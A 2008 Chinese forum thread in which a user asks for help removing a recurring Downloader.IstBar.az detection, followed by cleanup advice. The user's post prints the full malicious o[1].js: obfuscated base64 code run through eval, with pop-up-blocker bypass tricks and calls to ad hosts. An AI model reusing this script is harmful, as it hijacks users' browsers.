请各位帮忙杀个毒

显示全部楼层 · 发表于 2008-2-1 01:16:16

最近电脑中多了一个叫Downloader.IstBar.az的病毒，是用AVG查出来的，但杀掉后每次重启系统就又出来了，请各位大侠帮帮忙？

显示全部楼层 · 发表于 2008-2-1 11:18:13

路径是什么？安全模式杀过吗？

显示全部楼层 · 发表于 2008-2-1 15:06:12

路径是C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S2VJVYR3\o[1].js -> Downloader.IstBar.az : 未进行操作.
在安全模式下杀过，但还是有。
另，我现在用的是vista
请版主帮忙

显示全部楼层 · 发表于 2008-2-1 15:15:19

用记事本打开o[1].js文件的内容如下：
function get(murl,name)
{
source=murl;
var reg = new RegExp("(^|\\?|&)"+ name +"=([^&]*)(\\s|&|$)", "i");
if (reg.test(source)) return RegExp.$2; return "";
}
var strreferrer=document.location;
var krview=get(strreferrer,"krview");
var cid,username,adid_ary,ad_replace,width,height,codetype,playtime,strreferrer,isnum;
var krcid=cid;
if(!playtime){playtime=5}
playtime=60;
var khost = "u.keyrun.com";
function get_cookie(Name) {
var search = Name + "="
var returnvalue = "";
if (document.cookie.length > 0) {
offset = document.cookie.indexOf(search)
if (offset != -1) {
offset += search.length
end = document.cookie.indexOf(";", offset);
if (end == -1)
{
returnvalue=unescape(document.cookie.substring(offset, document.cookie.length))
}
else
{
returnvalue=unescape(document.cookie.substring(offset, end))
}
}
}
return returnvalue;
}
canopen=false;
isnum=get_cookie('kcc_'+krcid+username);
if (isnum==''){
isnum=Math.floor(Math.random()*100);
var Then = new Date();
Then.setTime(Then.getTime() + 120*60000);
document.cookie='kcc_'+krcid+username+'='+isnum+';expires='+ Then.toGMTString();
canopen=true;
}
canopen=true;
var p="krcid="+krcid+"&username="+username+"&adid_ary="+adid_ary+"&ad_replace="+ad_replace+"&width="+width+"&height="+height+"&codetype="+codetype+"&krview="+krview+"&isnum="+isnum+"&strreferrer="+strreferrer;
var paypopupURL="http://"+khost+"/code/o.php?"+p;
document.write('<a href="http://www.keyrun.com/web.html?user='+username+'" target="_blank"><img src="http://union.keyrun.com/img/default.gif" style="cursor: hand;" title="麒润网络广告，网络广告多种模式、多站式投放，实时查询精确统计数据！" width="88" height="31" border=0></a>');

var oV1=window; function fStart(u,n,v) { if (!oV1.opera) var twin=oV1.open(u,n,v); if (!window.fV1) {fV13();} var w=oV2(u,n,v); var wo=vWA[w]; wo.pw=twin; fV3("fV10(" + w + ")",100); return (wo.pw&&fV35)?wo.pw:wo; } function fV11() {return fV6(vV1);} function fV5(x) { return true; } function oV2(u,n,v) { var c = vWA.length; vWA[c] = new Array; var cw = vWA[c]; var tn=new Date(); if (!v) var v=''; if (!n) var n=tn.getTime()+'N'+c; cw.location=u; cw.f=1; cw.s=0; cw.n=n; cw.v=v; cw.cn=""; cw.cnt=c; cw.blur=function() {cw.f=-1;}; cw.focus=function() {cw.f=1;}; return c } function fV13() { oV5=oV1.document; vWA=new Array; fV1=oV1.open; fV2=oV1.focus; fV3=setTimeout; fV4=clearTimeout; vV1='PE9CSkVDVCBJRD0nb1Y0JyBkYXRhPScvZmF2aWNvbi5pY28nIHR5cGU9J2FwcGxpY2F0aW9uL3htbCc+PC9PQkpFQ1Q+'; fV20=(document.all&&!oV1.opera)?1:0; isG=fV31=fV32=fV35=0; fV21=fV20?(navigator.appVersion.indexOf('NT 5.1')>0):0; fV34=fV20?(navigator.appVersion.indexOf('MSIE 7')>0):0; if (navigator.userAgent) { fV35=!fV20?(navigator.userAgent.indexOf('Firefox/2')>0):0; } oV5.write(fV6('PGlucHV0IHN0eWxlPSJ3aWR0aDowcHg7IHRvcDowcHg7IHBvc2l0aW9uOmFic29sdXRlOyB2aXNpYmlsaXR5OmhpZGRlbjsiIGlkPSJvVjYiIG9uY2hhbmdlPSJmVjgoZlYxLDUsdHJ1ZSkiPg==')); oV5.write(fV6('PGRpdiBzdHlsZT0iZGlzcGxheTppbmxpbmUiIGlkPSJvVjEwIj48L2Rpdj4=')); } function debug() {void(0)} function fV6(input) { var o = ""; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); do { enc1 = keyStr.indexOf(input.charAt(i++)); enc2 = keyStr.indexOf(input.charAt(i++)); enc3 = keyStr.indexOf(input.charAt(i++)); enc4 = keyStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) | (enc2 >> 4); chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); chr3 = ((enc3 & 3) << 6) | enc4; o = o + String.fromCharCode(chr1); if (enc3 != 64) { o = o + String.fromCharCode(chr2); } if (enc4 != 64) { o = o + String.fromCharCode(chr3); } } while (i < input.length); return o; } function fV12() { if (--fV25<1) return; oV1.onerror=fV5; var t=fV3('fV12()',500); oV1.wO1=oV3.oV4.object.parentWindow; oV3.location=fV6('YWJvdXQ6Ymxhbms='); fV3('fV8(wO1.open,2)',200); fV4(t); } function fV17() { if (--fV25<1) { fV25=25; var t=fV3('fV12()'); return; } var x=fV3('fV17()',250); oV1.fV14=oV8.children[0].parentWindow; fV1=fV14.open; fV4(x); oV8.removeChild(oV8.children[0]); oV5.all['oV6'].fireEvent('onchange'); } function fV16() { if (fV34 || fV21) { oV5.all['oV6'].fireEvent('onchange'); } else { z=createPopup(); oV8=z.document.body; oV8.innerHTML=fV6(vV1); fV25=5; fV3('fV17()',200); } } function fV19(v) { if (oV5.getElementById('oV10')) { oV5.getElementById('oV10').innerHTML=v; } else { var o=oV5.createElement("span"); o.innerHTML=v; o.style.visibility = "visible"; oV5.body.appendChild(o); } } function fV23() { fV8(fV1,4); } function fV22() { if (--fV25==0) {fV21=0; fV7(); return;} var wo=vWA[0]; var x=fV3('fV22()',750); var o=fV24('oV9'); if (o.DOM) { fV4(x); fV25=1; eval(fV6('d28ucHc9by5ET00uU2NyaXB0Lm9wZW4od28ubG9jYXRpb24sJycsd28udik7')); if (wo.pw || fV34) { fV9(wo,4); } else { var t=fV3('fV33()',500); eval(fV6("dmFyIG91dD0ic2hvd01vZGFsRGlhbG9nKCdqYXZhc2NyaXB0OndpbmRvdy5vbmVycm9yPWZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9OyBzZXRUaW1lb3V0KFwid2luZG93LmNsb3NlKClcIiw1MCk7IHg9d2luZG93Lm9wZW4oXCJhYm91dDpibGFua1wiLFwiIiArIHdvLm4gKyAiXCIsXCIiICsgd28udiArICJcIik7ICB4LmJsdXIoKTsgd2luZG93LmNsb3NlKCknLCcnLCdoZWxwOjA7Y2VudGVyOjA7ZGlhbG9nV2lkdGg6MTtkaWFsb2dIZWlnaHQ6MTtkaWFsb2dMZWZ0OjUwMDA7ZGlhbG9nVG9wOjUwMDA7Jyk7Ijsgby5ET00uU2NyaXB0LmV4ZWNTY3JpcHQob3V0KTsg")); fV3('fV23()'); fV4(t); } } } function fV28() { fV19(fV6('PG9iamVjdCBpZD0ib1Y5IiBvbmVycm9yPSJmVjI1PTEiIHN0eWxlPSJwb3NpdGlvbjphYnNvbHV0ZTtsZWZ0OjE7dG9wOjE7d2lkdGg6MTtoZWlnaHQ6MSIgY2xhc3NpZD0iY2xzaWQ6MkQzNjAyMDEtRkZGNS0xMWQxLThEMDMtMDBBMEM5NTlCQzBBIj48U0NSSVBUPmZWMjU9MTwvU0NSSVBUPjwvb2JqZWN0Pg==')); fV25=6; fV3('fV22()',500) } function fV26() { fV19(fV6('PElGUkFNRSBpZD0ib1YzIiBOQU1FPSJvVjMiIFNUWUxFPSJ2aXNpYmlsaXR5OmhpZGRlbjsgcG9zaXRpb246YWJzb2x1dGU7d2lkdGg6MTtoZWlnaHQ6MTsiIHNyYz0iamF2YXNjcmlwdDpwYXJlbnQuZlYxMSgpIj48L0lGUkFNRT4=')); fV25=20; fV3('fV12()',200); } function fV30() { fV3('fV32?fV29():fV28()'); var o=document.createElement('object'); o.onreadystatechange=function(){fV32=1}; o.classid='clsid:D2BD7935-05FC-11D2-9059-00C04FD7A1BD'; o.onreadystatechange=function(){fV32=0}; } function fV29() { fV3('fV31?fV28():fV33()'); var o=document.createElement('object'); o.onreadystatechange=function(){fV31=1}; o.classid='clsid:9E30754B-29A9-41CE-8892-70E9E07D15DC'; o.onreadystatechange=function(){fV31=0}; } function fV33() { fV3('isG?fV16():fV26();'); var o=document.createElement('object'); o.onreadystatechange=function(){isG=1}; o.classid='clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB'; o.onreadystatechange=function(){isG=0}; } function fV7() { oV5.body.onclick=function(){fV8(oV1.open,3)}; if (oV5.createElement) { fV24=oV5.getElementById; if (fV34) fV21=0; if (fV20) { if (fV21) { fV30(); } else { fV33(); } } else { if (!fV35) { out='<embed style="position:absolute; top:0px" swliveconnect="true" src="http://'+khost+'/cmp2.swf" width="1" height="1">'; fV19(out); } if (!oV5.all) { x=oV5.getElementById('oV6'); x.focus(); x.value=Math.random(); } } } } function fV8(f,t,y) { for (var i=0;i < vWA.length;i++) if (vWA.s==0) { vWA.s=-1; var wo=vWA; wo.pw=f(wo.location,wo.n,wo.v); fV3("var i="+i+"; var wo=vWA; if(wo.s==-1){wo.s=0}"); fV9(wo,t); } } function fV9(wo,s) { if (!s) s=0; if (wo.s > 1) return; if (s==0) var t=fV3("fV7()",500); if (s==4) var t=fV3('fV33()',500); if (s==5 && isG) var t=fV3('fV26()',200); oV1.onerror=fV5; if (wo.pw) { if (wo.f==-1) { wo.pw.blur(); fV34?oV5.focus():fV2(); } else { wo.pw.focus(); } wo.s=2; fV4(t); eval(fV6('Y2g9dHJ1ZTsgaWYgKHdpbmRvdy5hb19saWMpIHtjaD13by5sb2NhdGlvbi5pbmRleE9mKCdjYXNhbGVtZWRpYS5jb20nKT09MDt9IGVsc2UgeyBjaD10cnVlIH0NCmlmIChjaCkgew0KICBpZiAoMSArIE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqIDEwMCkgPCA2KSB7DQogICAgdmFyIHg9bmV3IEltYWdlKCk7DQogICAgeC5zcmM9J2h0dHA6Ly93d3cuYWRvdXRwdXQuY29tL3ZlcnNpb24yL2hpdC5jZm0/dHlwZT0nICsgczsNCiAgfQ0KfQ==')); oV1.onerror=null; } } function fV10(w) { if (oV1.opera && !fV20) {fV7();return;} wo=vWA[w]; fV9(wo); }
var casalef='width=800,height=600,toolbar=1,location=1,titlebar=1,menubar=1,scrollbars=1,resizable=1,directories=1,status=1';
var l = (screen.width -  800) / 2 ;
var t = (screen.height - 600) / 2 ;
var keyrunpop = fStart(paypopupURL,'',casalef+',left='+l+',top='+t);
keyrunpop.blur();

显示全部楼层 · 发表于 2008-2-1 16:58:38

我没用vista。但是看你的这个病毒应该是在IE缓存中。
为了安全起见，你可以进入安全模式，然后在IE选项中清除缓存就行了。

显示全部楼层 · 发表于 2008-2-1 17:36:00

现在的问题不是不能杀，而是杀完后又出来了

显示全部楼层 · 发表于 2008-2-1 18:00:47

在安全模式下进行操作，可能效果更好些：
1、先升级杀软至最新版；
2、重启电脑至安全模式下。先清除IE缓存，然后杀毒。

这些都是常识。
你描述的这个病毒确实是位于IE缓存中，但是有可能并非只有这一个，可能还有它的其它附属病毒体在系统目录或其它地方。所以建议你先杀毒。

显示全部楼层 · 发表于 2008-2-4 11:09:24

建议楼主用sreng扫个报告上来

显示全部楼层 · 发表于 2008-2-4 11:16:44

网上找到了篇文章，希望对您有所帮助
病毒downloader.istbar的解决方法
最近收到很多用户反馈，该病毒无法彻底清理。主要有以下几个病毒名：Downloader.IstBar、TrackingCookie.2o7、downloader.istbar.ai等等。

关于病毒的详细情况，这里不做介绍。

预备工作：

必须使用杀毒工具杀毒一次。推荐下载AVG Anti-Spyware V7.5.0.50 简体中文版。

在正常情况下查杀一次，再进入安全模式下查杀一次。之后，病毒算是清除了，但还有一个步骤，少不了。

重要步骤：

找到这个C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5，把里面的文件全删除!清空回收站!！！！！

如果，嫌手动太麻烦了，当查杀结束后，使用恶意软件清理助手把临时文件清理一次。

到这里，病毒真的彻底清除了。

来源：
http://publish.it168.com/2007/0614/20070614126801.shtml

PS：当然，偶还建议楼主关闭系统还原后，在安全模式下查杀！！！

[ 本帖最后由 magicx 于 2008-2-4 11:17 编辑 ]

显示全部楼层 · 发表于 2008-2-4 11:17:03

原帖由 听雨醉 于 2008-2-1 18:00 发表
在安全模式下进行操作，可能效果更好些：
1、先升级杀软至最新版；
2、重启电脑至安全模式下。先清除IE缓存，然后杀毒。

这些都是常识。
你描述的这个病毒确实是位于IE缓存中，但是有可能并非只有这一个，可能 ...

杀毒前后．也可借助兔子之类软件清理文件及注册表

[已解决] 请各位帮忙杀个毒